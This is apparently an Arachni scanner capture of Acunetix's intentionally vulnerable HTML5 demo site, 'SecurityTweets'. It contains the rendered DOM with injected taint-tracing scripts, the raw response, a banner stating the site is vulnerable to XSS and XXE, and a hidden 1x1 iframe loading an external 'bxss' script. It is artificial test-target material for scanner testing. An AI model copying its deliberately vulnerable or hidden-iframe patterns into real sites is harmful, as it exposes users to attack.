386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script 